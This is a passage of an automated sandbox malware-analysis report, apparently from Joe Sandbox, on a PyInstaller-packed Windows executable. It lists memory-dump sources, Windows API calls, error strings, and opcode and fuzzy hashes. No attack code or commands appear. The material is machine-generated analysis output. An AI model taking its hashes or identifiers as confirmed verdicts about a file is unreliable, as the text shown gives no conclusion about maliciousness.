                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                                                                                                                                                                                                                                                                  • Instruction ID: c43b5d8b3216b85f07106a124ee55d4543bd98547c3d970cd6b6de5a9db94f12
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85015B30F0D6C240FA907B6565419F9E290BF407A4FB45637EA2D436E6DE6CA442C730
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 651ced10ad2dadb8782a4b50fa4e6780b40fd0fe2b12c6582135be627fb0e55a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E0B674F0828642FE55BAA04A82AF991506F54341FB44432DA0D4B2E3DE1C6C96D671
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 377330604-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                                                                                                                                                                                                                                                                  • Instruction ID: a06e036d0704350d8b7874984e97c9ca9058a598835004d465e79264c7c29f4d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A416726E2C6C641F611AB24D5112FDA360FBA5744FB49233DB8D43153EF28E6D8C310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF78F49B9A6,?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02), ref: 00007FF78F49F1AD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                                                                  • Instruction ID: b509c355ebb9b2a29f1bbd1ebbfc6ccc98d1fdcac5038b77901ac04d44030321
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BF04F75B0968685FE547662D912AF5E291BF88B60FEC4432CD0E473E1EF1CA880C2B0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF78F490D24,?,?,?,00007FF78F492236,?,?,?,?,?,00007FF78F493829), ref: 00007FF78F49DBFA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 33ec4e4790ad94f4d1f481e9b928cd4adc0a31589453a0e753b57db2f570d4bb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF0FE75B0D2C645FE5476629901AF5D1A07F88760FA84732D96E872E2DD6DA481C230
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75e4f7251f7fa3eb130b49b09e76f5f19ea289eaba66fe199a78b58bdf75e471
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E19F74A1EB8390FA99AB46A8501F4E6B5BF45740FF45037C81E077A8FFADE558C220
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                                                                                                  • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                                                                                                  • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                                                                  • Instruction ID: cece9afdace717f9ce07678ec81205113de5bcb57db01d5dffe99995e7a0a1f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CA17A36619BC587E7149F62E45479AB770F788B84FA0412AEB9D03B24CF3DE168CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                  • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                                  • Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                                                                  • Instruction ID: 18270f34bb625415664d3a96e796289e891e033b7e54a8f9be3388380bcf2bdb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EB20572F192C28BE764DF66D5407FDB7A2FB54388FA01136DA0D57A98DB38A900CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00007FF78F482A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488587
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32 ref: 00007FF78F4885B6
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF78F48860C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                                                                  • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3206c4b399cf43b9364e9fda06563792582c539744429a49517dad6683dc3eca
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB218071A1DAC281F760AF16E8542EAA3A0FF88384FE40037E54D836A5EF3CD146C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a4043ac08dfc8e7577b1046fad2d8d9dcc83c9f453c3ec5efbd3fdae03e3ae9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5315E72619AC186EB60AF61E8407EDB364FB84748F94403ADB4D47B98DF38D648C724
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                                                                  • Instruction ID: a91d02dd46eb20fbccd997d782117d7368f14e6c0db2a1f62d074149ca53c40d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72316332618BC186DB60DF25E8406EDB3A0FB85798FA00136EA8D47B65DF3CD545CB10
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0da548dbd471f2b842d12e74d6688949e71655204efc1bf723927650ca6fcef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB1D632B1A6D241EA61AB2298009F9E351FB44BD4FA44133EE5E47BD9DF3CE541D720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
